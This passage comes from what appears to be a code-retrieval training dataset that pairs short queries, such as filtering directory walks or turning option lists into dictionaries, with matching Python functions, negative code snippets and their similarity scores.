= raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \" \\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\r\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\r\n \"no\": False, \"n\": False}\r\n if default is None:\r\n prompt = \" [y/n] \"\r\n elif default == \"yes\":\r\n prompt = \" [Y/n] \"\r\n elif default == \"no\":\r\n prompt = \" [y/N] \"\r\n else:\r\n raise ValueError(\"invalid default answer: '%s'\" % default)\r\n\r\n while True:\r\n sys.stdout.write(question + prompt)\r\n choice = raw_input().lower()\r\n if default is not None and choice == '':\r\n return valid[default]\r\n elif choice in valid:\r\n return valid[choice]\r\n else:\r\n sys.stdout.write(\"Please respond with 'yes' or 'no' (or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True, \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\n \"yes\": True,\n \"y\": True,\n \"ye\": True,\n \"no\": False,\n \"n\": False\n }\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' (or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n\tvalid = {\"yes\": True, \"y\": True, \"ye\": True,\n\t\t\t \"no\": False, \"n\": False}\n\tif default is None:\n\t\tprompt = \" [y/n] \"\n\telif default == \"yes\":\n\t\tprompt = \" [Y/n] \"\n\telif default == \"no\":\n\t\tprompt = \" [y/N] \"\n\telse:\n\t\traise ValueError(\"invalid default answer: '%s'\" % default)\n\n\twhile True:\n\t\tsys.stdout.write(question + prompt)\n\t\tchoice = raw_input().lower()\n\t\tif default is not None and choice == '':\n\t\t\treturn valid[default]\n\t\telif choice in valid:\n\t\t\treturn valid[choice]\n\t\telse:\n\t\t\tsys.stdout.write(\"Please respond with 'yes' or 'no' \"\n\t\t\t\t\t\t\t \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True, '1': True,\n \"no\": False, \"n\": False, '0': False, }\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")" ]
[ "0.82480913", "0.8201619", "0.8161579", "0.81534576", "0.81376886", "0.81355315", "0.81342065", "0.8133191", "0.8133191", "0.8130005", "0.8128684", "0.8128684", "0.8128684", "0.8128684", "0.8128684", "0.81278366", "0.81278366", "0.81278366", "0.81278366", "0.81278366", "0.81278366", "0.81278366", "0.81278366", "0.8127609", "0.8126707", "0.81220657", "0.81163895", "0.81112105", "0.81088907", "0.8103927" ]
0.85351175
0
Perform a filtered directory walk.
def filtered_walk(rootdir, filter_fn, include_dirs=None, exclude_dirs=None, get_dirs=False): flist = [] dlist = [] for root, dirs, files in os.walk(rootdir): if include_dirs and len(set(root.split(os.sep)).intersection(set(include_dirs))) == 0: ## Also try re.search in case we have patterns if re.search("|".join(include_dirs), root): pass else: continue if exclude_dirs and len(set(root.split(os.sep)).intersection(set(exclude_dirs))) > 0: continue if exclude_dirs and re.search("|".join(exclude_dirs), root): continue dlist = dlist + [os.path.join(root, x) for x in dirs] flist = flist + [os.path.join(root, x) for x in filter(filter_fn, files)] if get_dirs: return dlist else: return flist
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def filter(self):\n self._printer('Standard Walk')\n count = Counter(length=3)\n for directory in self.directory:\n self._printer('Searching ' + directory)\n for root, directories, files in os.walk(directory, topdown=self.topdown):\n root = root[len(str(directory)) + 1:]\n self._printer(str(count.up) + \": Explored path - \" + str(root), stream=True)\n if self.filters.validate(root):\n # Check that non-empty folders flag is on and we're at the max directory level\n if self.filters.non_empty_folders and self.filters.get_level(root) == self.filters.max_level:\n # Check that the path is not an empty folder\n if os.path.isdir(directory + os.sep + root):\n # Get paths in folder without walking directory\n paths = os.listdir(directory + os.sep + root)\n\n # Check that any of the paths are files and not just directories\n if paths and any(os.path.isfile(os.path.join(directory, p)) for p in paths):\n self.add_path(directory, root)\n\n else:\n for filename in files:\n fullname = os.path.join(root, filename)\n if self.filters.validate(fullname):\n # Join the two strings in order to form the full filepath.\n self.add_path(directory, fullname)", "def scan_directories(data_dir, file_filter):\n\n root = os.walk(data_dir)\n\n print('Scanning for files...')\n output = []\n\n for directory in root:\n\n files = directory[2]\n\n # Valid dataset contains video files of both halves and an accompanying label\n if file_filter(files):\n output.append(directory[0])\n\n print('Done')\n\n return output", "def walk(dirname): \n for name in os.listdir(dirname):\n path = os.path.join(dirname, name)\n if os.path.isfile(path):\n print(path)\n else:\n walk(path)", "def test_scan_dir_files(self):\n self.run_scan(self.subdir, self.nest_fcount + 1)", "def file_walker(root,**kwargs):\n\n # Get our keyword argunents, and do some initialization.\n max_depth=kwargs.get('depth',None)\n if max_depth==None:\n max_depth=sys.maxsize # I don't think we'll hit this limit in practice.\n follow_links=kwargs.get('follow_links',True)\n prune=compile_filename_patterns(kwargs.get('prune',[]))\n ignore=compile_filename_patterns(kwargs.get('ignore',[]))\n report_dirs=kwargs.get('report_dirs',False)\n if report_dirs not in (False,True,'first','last'):\n raise ValueError(\"report_dirs=%r is not one of False, True, 'first', or 'last'.\"%(report_dirs,))\n stack=[(0,root)] # Prime our stack with root (at depth 0).\n been_there=set([os.path.abspath(os.path.realpath(root))])\n dir_stack=[] # Stack of paths we're yielding after exhausting those directories.\n\n while stack:\n depth,path=stack.pop()\n if report_dirs in (True,'first'):\n yield path+os.sep\n elif report_dirs=='last':\n dir_stack.append(path+os.sep)\n flist=os.listdir(path)\n flist.sort()\n dlist=[]\n # First, let the caller iterate over these filenames.\n for fn in flist:\n p=os.path.join(path,fn)\n if os.path.isdir(p):\n # Just add this to this path's list of directories for now.\n dlist.insert(0,fn)\n continue\n pat,mat=first_match(fn,ignore)\n if not pat:\n yield p\n # Don't dig deeper than we've been told to.\n if depth<max_depth:\n # Now, let's deal with the directories we found.\n for fn in dlist:\n p=os.path.join(path,fn)\n # We might need to stack this path for our fake recursion.\n if os.path.islink(p) and not follow_links:\n # Nope. We're not following symlinks.\n continue\n rp=os.path.abspath(os.path.realpath(p))\n if rp in been_there:\n # Nope. We've already seen this path (and possibly processed it).\n continue\n m=None\n pat,mat=first_match(fn,prune)\n if pat:\n # Nope. This directory matches one of the prune patterns.\n continue\n # We have a keeper! Record the path and push it onto the stack.\n been_there.add(rp)\n stack.append((depth+1,p))\n while dir_stack:\n yield dir_stack.pop()", "def walk(dirname):\n for name in os.listdir(dirname):\n path = os.path.join(dirname, name)\n\n if os.path.isfile(path):\n print(path)\n else:\n walk(path)", "def __walk_tree(self):\n for root, dirnames, files in os.walk(self.path, topdown=True):\n self.dirCount += 1\n # Create a tuple with the file size, the file name and the files inode (for tracking hard links).\n files = [\n (os.lstat(os.path.join(root, fi)).st_size, os.path.join(root, fi), os.lstat(os.path.join(root, fi)).st_ino) for fi\n in files if (os.lstat(os.path.join(root, fi)).st_size > self.size)]\n self.fileList.extend(files)\n if len(self.excludeList) > 0:\n dirnames[:] = [dir for dir in dirnames if dir not in self.excludeList]\n if not self.cross_mount_points:\n dirnames[:] = [dir for dir in dirnames if not os.path.ismount(os.path.join(root, dir))]", "def filtered_walk(\n path: str,\n include: Optional[List[str]] = None,\n exclude: Optional[List[str]] = None\n) -> Iterator[str]:\n exclude = exclude or []\n\n if not isdir(path):\n raise ValueError(\"Cannot walk files, only directories: {}\".format(path))\n\n files = os.listdir(path)\n for name in files:\n filename = normpath(join(path, name))\n\n # If excluded, completely skip it. Will not recurse into directories\n if search_globs(filename, exclude):\n continue\n\n # If we have a whitelist and the pattern matches, yield it. If the\n # pattern didn't match and it's a dir, it will still be recursively\n # processed.\n if not include or match_globs(filename, include):\n yield filename\n\n if isdir(filename):\n for p in filtered_walk(filename, include, exclude):\n yield p", "def walk(dir, op=None):\n files = os.listdir(dir)\n for afile in files:\n path = os.path.join(dir, afile)\n if os.path.isdir(path):\n walk(path, op)\n elif os.path.isfile(path) and isJsFile(path):\n if op:\n op(path)\n else:\n print \"dir: %s, file: %s\" % (dir, path)", "def walk(tgt_dir,meth):\n tgt_dir = os.path.abspath(tgt_dir)\n for fname in [fname for fname in os.listdir(tgt_dir) if not fname in [\".\",\"..\"]]:\n nfile = os.path.join(tgt_dir,fname)\n meth(nfile)\n if os.path.isdir(nfile):\n walk(nfile,meth)", "def walk(self):\n if os.path.exists(self.folder):\n for root_path, _, f_files in os.walk(self.folder):\n yield root_path, f_files\n if not self.recursive:\n break\n else:\n print(f\"[!e] Passed folder doesn't exist. Path: {self.folder}\",\n file=sys.stdout)\n exit(0)", "def walk(dir, callback):\n\n dir = abspath(dir)\n for file in listdir(dir):\n nfile = join(dir, file)\n if isdir(nfile):\n walk(nfile, callback)\n else:\n callback(nfile)", "def walk(self): # DirObj.walk\n for name, subdir in self.subdirs.iteritems():\n for e in subdir.walk():\n yield e\n for name, fileEntry in self.files.iteritems():\n yield fileEntry\n yield self", "def dirwalk(self, topdown=False): # DirObj.dirwalk\n if topdown:\n yield self\n\n for name, d in self.subdirs.iteritems():\n for dirEntry in d.dirwalk():\n yield dirEntry\n\n if not topdown:\n yield self", "def analyze_dir(self, dirname):\n if self.exceeded_max():\n return\n\n for (dirpath, dirnames, filenames) in os.walk(dir_name):\n for filename in filenames:\n self.analyze_file(dirname + \"/\" + filename)", "def walk(self):\n if self.parallelize:\n self.filepaths = Sprinter(self.directory, self.filters, self.full_paths, self.pool_size,\n self._printer).sprinter()\n else:\n self.filepaths = Crawler(self.directory, self.filters, self.full_paths, self.topdown,\n self._printer).crawler()\n return self._get_filepaths()", "def _WalkFolders(self, folder_dict, parent):\n entries = folder_dict.keys()\n entries.sort()\n for e in entries:\n if folder_dict[e]:\n # Folder\n n_subfolder = self.doc.createElement('Filter')\n n_subfolder.setAttribute('Name', e)\n parent.appendChild(n_subfolder)\n self._WalkFolders(folder_dict[e], n_subfolder)\n else:\n # File\n n_file = self.doc.createElement('File')\n n_file.setAttribute('RelativePath', e)\n parent.appendChild(n_file)", "def getImmediateSubdirectories(dir):", "def directoryModifiedHandler(ob, event):\n query = dict(object_provides=IEntry.__identifier__)\n for l in ob.restrictedTraverse('@@folderListing')(**query):\n l.getObject().reindexObject(idxs=[\"pdir_keywords\"])", "def dirwalk(a_dir, a_wildcards= '*'):\n\n #iterate over files in the current dir\n for the_file in fnmatch.filter(sorted(os.listdir(a_dir)), a_wildcards):\n fullpath = os.path.join(a_dir, the_file)\n if not os.path.isdir(fullpath):\n yield fullpath\n \n sub_dirs = os.walk(a_dir).next()[1]\n #iterate over sub_dirs\n for sub_dir in sub_dirs:\n fullpath = os.path.join(a_dir, sub_dir)\n for p_elem in dirwalk(fullpath, a_wildcards):\n yield p_elem", "def walk_dir(self, dir):\n if self.ppath_prefix_len:\n prefix = self.ppath_prefix[self.ppath_prefix_idx%self.ppath_prefix_len]\n self.ppath_prefix_idx += 1\n merged_path = os.path.join(prefix, dir)\n for root, dirs, files in self.fswalk_base(merged_path):\n yield merged_path, dirs, files\n else:\n yield self.fswalk_base(dir)", "def walk(root_path, type_filter=None, pattern=None, return_basename=False):\n # Sanity check\n if not os.path.exists(root_path):\n raise FileNotFoundError('!! `{}` not exist'.format(root_path))\n paths = [os.path.join(root_path, p) for p in os.listdir(root_path)]\n # Filter path\n if type_filter in ('file',): type_filter = os.path.isfile\n elif type_filter in ('folder', 'dir'): type_filter = os.path.isdir\n else: assert type_filter is None\n if callable(type_filter): paths = list(filter(type_filter, paths))\n # Filter pattern\n if pattern is not None:\n paths = list(filter(lambda p: fnmatch(p, pattern), paths))\n if return_basename: return [os.path.basename(p) for p in paths]\n return paths", "def _recursive_scan(directory=None, file_extension='.dvl'):\n directory = directory or app.config['DEVICE_LOG_DRIVE']\n\n for entry in os.scandir(directory):\n if entry.is_dir(follow_symlinks=False):\n yield from _recursive_scan(entry)\n elif os.path.splitext(entry.name)[1] == file_extension:\n yield entry", "def walk( root, depth=None, include=None, exclude=None, callback=None ):\n\tfiles = []\n\tstack = [ root, ]\n\tif callback is None:\n\t\tcallback = lambda x:files.append(x)\n\twhile stack and ( not depth or len(stack) <= depth ):\n\t\td = stack.pop()\n\t\tsubs = []\n\t\tfor e in listdir( d ):\n\t\t\tc = join( d, e )\n\t\t\tif isdir( c ):\n\t\t\t\tsubs.append( c )\n\t\t\telif ((not include) or match( include, c)) \\\n\t\t\t\t and ((not exclude) or not match( exclude, c)):\n\t\t\t\tcallback( c )\n\t\tstack.extend( subs )\n\treturn files", "def scan ( self, **kw ):\n stats = self.STATS\n stats.scan_time.begin ( self.name )\n for subdir in os.listdir ( self.physical_location ):\n if self.has_dir ( subdir ):\n pkgdir = self._get_package_dir ( subdir )\n try:\n pkgdir.scan ( stats=stats, **kw )\n finally:\n if pkgdir.empty():\n del self._subdirs [subdir]\n\n stats.scan_time.end ( self.name )", "def directory_walker(start_dir):\n\n for root, dirs, files in os.walk(os.path.expanduser(start_dir)):\n for f in files:\n filename = os.path.join(root, f)\n # Only process if its a type of image\n file_type = mimetypes.guess_type(filename.lower())[0]\n if file_type is not None and file_type.startswith('image/'):\n yield filename", "def list_and_filter(self, pattern, root_path):\n for path, dirs, files in os.walk(os.path.abspath(root_path)):\n for filename in fnmatch.filter(files, pattern):\n yield os.path.join(path, filename)", "def iter_dir_tree(top, nohidden=True, pattern=\".*\"):\n for root, dirs, files in os.walk(top):\n if nohidden:\n remove_hidden_files(dirs)\n remove_hidden_files(files)\n for f in files:\n if re.match(pattern, f):\n yield os.path.join(root, f)", "def process_directory(dir, exiftool_path):\n for path_object in pathlib.Path(dir).glob(\"**/*\"):\n if path_object.is_file():\n verbose(f\"Processing file {path_object}\")\n process_file(path_object, exiftool_path)\n elif path_object.is_dir():\n verbose(f\"Processing directory {path_object}\")\n process_directory(path_object, exiftool_path)", "def dir_filter(x):\n return os.path.isdir('logs/{}'.format(x))" ]
[ "0.7196122", "0.6588966", "0.6396584", "0.6380269", "0.6349008", "0.63149124", "0.61969244", "0.61103547", "0.60762525", "0.6074421", "0.60585856", "0.6046986", "0.60449713", "0.6044598", "0.60307413", "0.6027791", "0.60122037", "0.599719", "0.5978354", "0.5976603", "0.5976579", "0.5921626", "0.5893457", "0.5890631", "0.5869465", "0.58645713", "0.5847061", "0.58361703", "0.58346146", "0.5819341" ]
0.6661728
1
Transform option list to a dictionary.
def opt_to_dict(opts): if isinstance(opts, dict): return args = list(itertools.chain.from_iterable([x.split("=") for x in opts])) opt_d = {k: True if v.startswith('-') else v for k,v in zip(args, args[1:]+["--"]) if k.startswith('-')} return opt_d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_options(option_list: List[str]) -> Dict[str, Union[int, float, str]]:\n d = dict()\n for o in option_list:\n o = o.split('=')\n if len(o) != 3:\n raise OptionParsingError(\"Not enough elements in the parsed options. Need 3 elements.\")\n key = o[0]\n val = o[1]\n if o[2] not in type_mappings:\n raise OptionParsingError(f\"Unknown option type {o[2]}.\")\n type_func = type_mappings[o[2]]\n d.update({key: type_func(val)})\n return d", "def to_string_dict(self):\n ret_val = {}\n for section in self.parser.sections():\n for option in self.parser.options(section):\n sect = ret_val.get(section, {})\n sect[option] = self.parser.get(section, option)\n ret_val[section] = sect\n return ret_val", "def _fields_list_to_dict(fields, option_name):\n if isinstance(fields, abc.Mapping):\n return fields\n\n if isinstance(fields, (abc.Sequence, abc.Set)):\n if not all(isinstance(field, str) for field in fields):\n raise TypeError(\"%s must be a list of key names, each an \"\n \"instance of %s\" % (option_name,\n str.__name__))\n return dict.fromkeys(fields, 1)\n\n raise TypeError(\"%s must be a mapping or \"\n \"list of key names\" % (option_name,))", "def _to_dict(self, data_list):\n data_dict = dict(pair.split('=') for pair in data_list)\n return data_dict", "def _get_options_map(options: List[bs4.element.Tag]) -> OrderedDict:\n mapping = OrderedDict()\n for option in options:\n value, label = option[\"value\"], option.string\n if not value or value == \"0\" or not label:\n continue\n mapping[value] = label\n return mapping", "def getOptionsDict(self, section):\n answer = {}\n for option in self.getOptions(section):\n answer[option] = self.get(section, option)\n return answer", "def tcp_opts_tuple_list_to_dict(opts_list: list) -> dict:\n opts = {}\n if None in opts_list:\n opts_list.remove(None)\n for opt, value in opts_list:\n # here TCP_OPT_NOP is saved only once, even though multiple TCP_OPT_NOP might be present\n # since it doesn't affect our operations, or at least I couldn't think of one, so it's okay to overwrite it\n opts[opt] = value\n return opts", "def to_dict(self) -> dict:\n\n value_list = []\n if self.list_values:\n for value in self.list_values:\n if isinstance(value, dict):\n value_list.append(value)\n elif isinstance(value, PicklistValue):\n value_list.append(value.to_dict())\n else:\n raise TypeError(f\"Invalid type for `list_values` in Picklist.to_dict:\"\n f\"{type(self.list_values)}, {self.list_values}\")\n\n output = {\n \"list_name\": self.list_name.__str__(),\n \"list_values\": value_list,\n \"last_modified\": self.last_modified.timestamp() * 1000 # JS timestamps are in ms\n }\n\n return output", "def __parse_options_dict(options_str):\n # type: (str) -> Dict[str, str]\n opts = options_str.split('&') # type: List[str]\n res = {} # Type: Dict\n\n for opt in opts:\n key, value = opt.split('=') # type: List[str, str]\n res[key] = value # type: str\n\n return res", "def options(self):\n result = []\n for typ in type(self).mro():\n result.extend(k for k, v in typ.__dict__.items()\n if isinstance(v, Option))\n return dict((o, getattr(self, o)) for o in result)", "def dict_option(s):\n return _convert(s, (dict,))", "def _get_options(self) -> Dict[str, Any]:\n # TODO: handle holidays as well\n return {\n \"growth\": self.growth,\n \"changepoints\": self.changepoints and list(self.changepoints.astype('str')),\n \"n_changepoints\": self.n_changepoints,\n \"changepoint_range\": self.changepoint_range,\n \"changepoint_prior_scale\": self.changepoint_prior_scale,\n \"mcmc_samples\": self.mcmc_samples,\n \"interval_width\": self.interval_width,\n \"uncertainty_samples\": self.uncertainty_samples,\n \"yearly_seasonality\": self.yearly_seasonality,\n \"weekly_seasonality\": self.weekly_seasonality,\n \"daily_seasonality\": self.daily_seasonality,\n \"seasonality_mode\": self.seasonality_mode,\n \"seasonality_prior_scale\": self.seasonality_prior_scale,\n\n \"seasonalities\": self.seasonalities,\n \"extra_regressors\": self.extra_regressors\n }", "def asdict(self) -> dict[str, Any]:\n return {\n w.name: getattr(w, \"value\", None)\n for w in self._list\n if w.name and not w.gui_only\n }", "def initoptionsdict(cls):\n for i in range(len(clslist)):\n optionsdict.update(dict({clslist[i]: dict({'OPTIONS': dict()})}))", "def _parse_options(options):\n opts = dict()\n for attr in dir(options):\n if attr.startswith(\"__\"):\n continue\n opts[attr] = getattr(options, attr)\n return opts", "def to_dict(self, options={}):\n element_list = [cur_element.to_dict(options) for cur_element in self.geometry_list]\n result = {'elements': element_list}\n return result", "def to_dict(self) -> List[Dict[str, Any]]:\n return [x.to_dict() for x in self.inputs]", "def transform_list_to_dict(list):\n\n ret = {}\n\n for value in list:\n if isinstance(value, dict):\n ret.update(value)\n else:\n ret[str(value)] = True\n\n return ret", "def get_options(self):\n additional_data = self.get_additional_data()\n options_out = []\n for key, value in additional_data['DIMENSION_VALUES'].items():\n key_label = ' '.join(key.split('_')).strip().title()\n data = {'specification': key_label, 'specification_key': key, 'choices': value}\n options_out.append(data)\n return options_out", "def get_options(self):\r\n return self._option_values", "def _parse_arg_list(self):\n\t\targ_list = {}\n\t\tfor arg in getopt.getopt(sys.argv[1:], 'c:r:j:d')[0]:\n\t\t\targ_list[arg[0][1:]] = arg[1]\n\t\n\t\treturn arg_list", "def options(self):\n options = {\n o.name: getattr(self, o.name)\n for o in _OPTIONS\n }\n return options", "def to_dict(self) -> List[Dict[str, Any]]:\n return [x.to_dict() for x in self.params]", "def _section_as_dict(self, section):\n options = {}\n if not self.parser.has_section(section):\n return options\n for option in self.parser.options(section):\n # Don't know which options might be boolean so we can't use\n # self.parser.getboolean()\n tmp = self.get(section, option)\n if str(tmp).lower() in ['yes', 'y', 'true', 't']:\n options[option] = True\n elif str(tmp).lower() in ['no', 'n', 'false', 'f']:\n options[option] = False\n else:\n options[option] = str(tmp)\n return options", "def get_options(self):\n options = dict()\n while True:\n line = self.rfile.readline().decode(\"utf8\").strip()\n if not line:\n break\n self.log.debug(\"Got line: %s\", line)\n if \":\" not in line:\n self.log.debug(\"Invalid option: %s\", line)\n error_msg = \"header not in 'Name: value' format\"\n raise oa.errors.InvalidOption(error_msg)\n name, value = line.split(\":\", 1)\n options[name.lower()] = value.strip()\n return options", "def _extract_options(config, options, *args):\n extract = {}\n for key in args:\n if key not in args:\n continue\n extract[key] = config[key]\n option = getattr(options, key, None)\n if option is not None:\n extract[key] = option\n return extract", "def list_flattened_to_dict(self, listH, defaultItem={}):\n dictList = defaultItem\n for name in reversed(listH):\n dictList = {name: dictList}\n return dictList", "def arglist_parse_to_dict(arg_l):\n\n prop_d = {}\n for prop in arg_l:\n if len(prop) == 2:\n prop_l = prop\n elif ':' in prop:\n prop_l = prop.split(':')\n elif '=' in prop:\n prop_l = prop.split('=')\n else:\n exit( \"==> ERROR: invalid config. Use '=' or ':'.\" )\n if not len(prop_l) == 2:\n exit( \"==> ERROR: invalid config. Use one '=' per setting.\" )\n prop_d[prop_l[0]] = prop_l[1]\n return prop_d", "def options(request):\n return {option.name: option.get_value() for option in Option.objects.all()}", "def get_options():\n user_options = {}\n user_options['surface'] = {'label': 'Surface',\n 'type': 'stringList',\n 'default': 'bcc100',\n 'values': surface_selections}\n\n user_options['metal'] = {'label': 'Metal',\n 'type': 'string',\n 'default': 'Au'}\n\n user_options['a'] = {'label': 'Lattice Constant',\n 'type': 'float',\n 'precision': 3,\n 'suffix': 'Å'}\n\n user_options['size-x'] = {'label': 'Size X',\n 'type': 'integer',\n 'default': 5}\n\n user_options['size-y'] = {'label': 'Size Y',\n 'type': 'integer',\n 'default': 5}\n\n user_options['size-z'] = {'label': 'Size Z',\n 'type': 'integer',\n 'default': 3}\n\n user_options['vacuum'] = {'label': 'Vacuum distance',\n 'type': 'float',\n 'precision': 1,\n 'suffix': 'Å'}\n\n user_options['orthogonal'] = {'label': 'Orthogonal',\n 'type': 'stringList',\n 'default': 'True',\n 'values': ['True', 'False']}\n\n return {'userOptions': user_options }" ]
[ "0.6948613", "0.661204", "0.6580496", "0.65647084", "0.65088916", "0.6373278", "0.6370471", "0.63431555", "0.6230479", "0.6225121", "0.61512506", "0.6135905", "0.60848534", "0.6042554", "0.6006351", "0.5991005", "0.59683454", "0.58970153", "0.5887909", "0.5887085", "0.58858395", "0.5838247", "0.5833166", "0.58187306", "0.58103573", "0.5793962", "0.5792967", "0.5757677", "0.5741917", "0.5666034" ]
0.6884359
1
Remove unwanted options from an option list.
def prune_option_list(opts, keys): opt_d = opt_to_dict(opts) for k in keys: if k in opt_d: del opt_d[k] return [k for item in opt_d.iteritems() for k in item]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _sanitize(self, opts_list):\n for opt in opts_list:\n if len(opt.strip()) == 0:\n opts_list.remove(opt)\n return opts_list", "def remove_all(self):\n self._options.clear()\n self._programs.clear()", "def replace_unacceptable_options(options, is_request):\n newopts = []\n if is_request:\n valid = lambda _o: _o.valid_in_request()\n valid_multiple = lambda _o: _o.valid_multiple_in_request()\n else:\n valid = lambda _o: _o.valid_in_response()\n valid_multiple = lambda _o: _o.valid_multiple_in_response()\n last_number = 0\n for opt in sorted_options(options):\n delta = opt.number - last_number\n last_number = opt.number\n if not valid(opt):\n newopts.append(UnrecognizedOption.from_option(opt))\n elif (0 == delta) and not valid_multiple(opt):\n newopts.append(UnrecognizedOption.from_option(opt))\n else:\n newopts.append(opt)\n return newopts", "def cleanOptions(options):\r\n daemonize = options.pop('daemonize')\r\n _reload = options.pop('reload')\r\n dev = options.pop('dev')\r\n opts = []\r\n store_true = [\r\n '--nocache', '--global_cache', '--traceback', '--quiet', '--loud'\r\n ]\r\n store_false = []\r\n for key, value in options.iteritems():\r\n key = '--' + key\r\n if (key in store_true and value) or (key in store_false and not value):\r\n opts += [key, ]\r\n elif value:\r\n opts += [key, str(value)]\r\n return daemonize, _reload, opts", "def del_psana_options(self, keys):\n try:\n for key in keys:\n self._data.psana_cfg_dict.pop(key, None)\n except:\n print 'Invalid keys to remove from psana options:', keys", "def remove_state(self, state):\n if isinstance(self.options, list):\n self.options.remove(state)\n else:\n temp = list(self.options)\n temp.remove(state)\n self.options = tuple(temp)", "def removeOption(self, *args):\n return _libsbml.ConversionProperties_removeOption(self, *args)", "def remove_option(self, option):\n self.__options.pop(option)", "def remove_option_from_value(self, o):\n result = False\n for k in self._options:\n if self._options.get(k) == o:\n self._options.pop(k)\n result = True\n return result", "def remove_option(self, parts):\n body = ' '.join(parts)\n\n with self.voter_lock:\n option = self.results.get(body, None)\n\n if option is None:\n return 'Does not compute. Type \"ballot\" to see available options.'\n\n # Clear the votes for this option.\n self.results.pop(body)\n\n # Clear the votes from individual voter records\n for voter in self.voters.values():\n votes = voter['votes']\n\n while body in votes:\n votes.remove(body)\n\n return f'{option[\"name\"]} has been removed'", "def remove_option(self, label):\n del self._options[label]\n index = self._menu.index(label)\n self._menu.delete(index, index)", "def list_scrubber_opts():\n return [(g, copy.deepcopy(o)) for g, o in _scrubber_opts]", "def unregister_opts(self, opts, group=None):\n for opt in opts:\n self.unregister_opt(opt, group, clear_cache=False)", "def _unregister_opt(self, opt):\n if opt.dest in self._opts:\n del self._opts[opt.dest]", "def _remove_all(self):\n self._items.clear()\n self._listbox.delete(0, END)", "def _clean_args(sys_argv, args):\n # print(args.datadir)\n # print( os.path.abspath(os.path.expanduser(sys_argv[0])))\n # if sys_argv[0].startswith(\"_\") or not args.datadir == os.path.abspath(os.path.expanduser(sys_argv[0])):\n # print(\"aa\")\n base = [x for x in sys_argv if\n x.startswith(\"-\") or not args.datadir == os.path.abspath(os.path.expanduser(x))]\n # Remove installer only options we don't pass on\n base = [x for x in base if x not in set([\"--minimize-disk\"])]\n if \"--nodata\" in base:\n base.remove(\"--nodata\")\n else:\n 